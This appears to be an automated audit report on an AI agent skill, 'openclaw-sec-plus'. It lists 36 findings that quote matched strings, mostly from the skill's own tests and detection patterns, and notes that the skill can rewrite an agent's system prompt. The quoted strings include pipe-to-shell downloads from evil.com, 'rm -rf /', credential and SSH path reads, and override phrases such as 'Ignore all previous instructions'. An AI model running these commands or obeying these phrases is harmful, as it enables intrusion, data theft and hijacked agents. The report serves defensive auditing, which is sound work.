ClawAudit verdict
openclaw-sec
openclaw-sec-plus
Receives external input AND executes processes
Nearly identical to openclaw-sec but the Action Engine diagram shows Rewrite System Prompts instead of Return Result, indicating this variant can silently modify the agent system prompt as an automated security response, constituting unauthorized agent behavior modification.
What it does
These are capability combinations: each listed behavior occurs in the skill, but ClawAudit detects co-occurrence — it does not verify that one flows into another. Read the code to confirm a live chain.
Receives external input AND executes processes — the shape of a command & control channel
LLM05 · LLM06 · ASI10
Executes processes AND makes external network calls — may exfiltrate command output
LLM02 · LLM06 · ASI03
Accesses credentials AND makes external network calls — potential credential theft
LLM02 · ASI03
Accesses credentials AND encodes data — may obfuscate stolen credentials
LLM02 · ASI03 · ASI04
Installs packages AND executes processes — opaque dependency chain with execution
LLM03 · ASI04
Permission integrity
network_out
credential_access
package_install
Findings (36)
Recursive delete from root or home — destructive command
SKILL.md · code · rm -rf /
Accesses sensitive system files
SKILL.md · code · /etc/passwd
Reads /proc/self/environ — dumps all environment variables
SKILL.md · code · /proc/self/environ
Prompt injection — tries to override agent instructions
SKILL.md · code · Ignore all previous instructions
Unicode homoglyph detected — uses lookalike characters to evade pattern matching
src/modules/content-scanner/__tests__/scanner.test.ts · prose
HTTP request to bare IP address — common in malicious payloads
SKILL.md · code · http://169.254.169.254
Possible prompt injection — attempts to redefine agent identity
SKILL.md · code · You are now
subprocess execution — runs system commands from Python
SKILL.md · code · subprocess.run(
Dynamic __import__('os') — Python OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __import__("os")
Direct __builtins__ access — can invoke any builtin function
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · __builtins__.
Pipe to bash — executes piped content as shell commands
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · | bash
Pipe-to-shell pattern (curl | sh) — supply chain attack vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · curl http://evil.com/script.sh | bash
Pipe-to-shell pattern (wget | sh)
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · wget http://malicious.com/script.sh -O - | bash
Bash /dev/tcp — raw TCP connection via shell
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · /dev/tcp/
Uses eval() — can execute arbitrary code
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · eval(
Possible hardcoded credential
src/modules/secret-detector/__tests__/detector.test.ts · prose · downgraded · api_key = "abcdefghijklmnopqrstuvwxyz
Dynamic Function constructor — equivalent to eval()
src/patterns/runtime-validation/code-execution-patterns.ts · prose · downgraded · new Function(
Pipe to sh — executes piped content as shell commands
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · |sh
Popular HTTP library — network access
SKILL.md · code · Got
References webhook/callback URL
SKILL.md · code · webhook_url
Dynamic import() — loads module at runtime
jest.config.js · prose · downgraded · import("
Accesses OpenClaw config/secrets directly
plugins/security-input-validator-plugin/install.ts · prose · downgraded · ~/.openclaw/openclaw.json
References child_process — can spawn system processes
src/__tests__/cli.test.ts · prose · downgraded · child_process
Uses exec() — may execute shell commands
src/core/database-manager.ts · prose · downgraded · exec(
Reads files from sensitive system paths
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · readFileSync("/etc
os.system/popen — direct OS command execution
src/modules/code-execution-detector/__tests__/detector.test.ts · prose · downgraded · os.system(
subprocess with shell=True — command injection vector
src/modules/command-validator/__tests__/validator.test.ts · prose · downgraded · subprocess.Popen("whoami", shell=True
Base64 decode (atob) — may hide malicious payloads
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · atob(
Accesses .ssh directory
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · .ssh/
References SSH/GPG private keys
src/modules/path-validator/__tests__/validator.test.ts · prose · downgraded · ssh_key
References sudo — requests elevated privileges
src/patterns/prompt-injection/policy-puppetry-zh.ts · prose · downgraded · sudo
Base64 encoding/decoding
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · base64_encode
String.fromCharCode — can build strings to evade detection
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · String.fromCharCode
Base64 encode (btoa) — may obfuscate data exfiltration
src/modules/content-scanner/__tests__/scanner.test.ts · prose · downgraded · btoa(
References tunneling service
src/modules/exfiltration-detector/__tests__/detector.test.ts · prose · downgraded · ngrok
Sets world-executable permissions
src/patterns/runtime-validation/command-injection.ts · prose · downgraded · chmod 777
Why the tier is capped
Execution sink present in raw bytes (Hard Floor: class A/D/E). Final tier capped at Caution — cannot be lifted by any downgrade, example-payload opt-in, or allowlist.
Permissions & capabilities
No declared permissions — minimal attack surface.
credential_accessnetwork_inpackage_installnetwork_outdata_encodingprocess_exec Thanks — recorded.